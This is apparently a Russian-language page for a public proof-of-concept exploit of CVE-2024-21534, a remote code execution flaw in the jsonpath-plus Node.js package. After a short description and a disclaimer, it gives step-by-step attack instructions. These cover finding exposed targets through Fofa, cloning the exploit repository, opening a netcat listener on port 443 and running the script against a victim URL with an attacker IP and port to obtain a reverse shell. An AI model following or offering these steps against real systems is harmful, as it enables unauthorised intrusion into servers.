
POC - CVE-2024-21534 Jsonpath-plus уязвим к удаленному выполнению кода (RCE) из-за некорректной санитизации входных данных
CVE-2024-21534 — это критическая уязвимость, обнаруженная в версиях пакета jsonpath-plus до версии 10.0.0. Уязвимость возникает из-за неправильной санитизации входных данных, что может привести к удаленному выполнению кода (RCE) на затронутых системах. Эта уязвимость особенно опасна, поскольку она может быть использована без аутентификации, что позволяет злоумышленникам выполнять произвольный код на сервере путем отправки специально созданных входных данных. Проблема возникает из-за небезопасного использования по умолчанию модуля vm в Node.js, который в случае эксплуатации может скомпрометировать всю систему.
jsonpath-plus версии до 10.2.0
Уязвимость находится в пакете jsonpath-plus, который широко используется для запросов к структурам данных JSON в приложениях. Недостаток связан с неправильной санитизацией входных данных, что позволяет выполнять вредоносный код.
Читайте об этом — CVE-2024-21534
Дисклеймер: Эта Proof of Concept (POC) создана только для образовательных и этических целей тестирования. Использование этого инструмента для атак на цели без предварительного взаимного согласия незаконно. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб, причиненный этой программой.
Чтобы найти потенциальные цели, используйте Fofa (похож на Shodan.io):
Jsonpath-plus
Сначала клонируйте репозиторий:
git clone https://github.com/verylazytech/CVE-2024-21534
Теперь откройте слушатель с помощью nc:
nc -lnvp 443
Запустите эксплойт:
Убедитесь, что URL указывает на конечную точку, которая обрабатывает пользовательский ввод через уязвимый пакет jsonpath-plus, так как это позволит использовать уязвимость RCE.
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

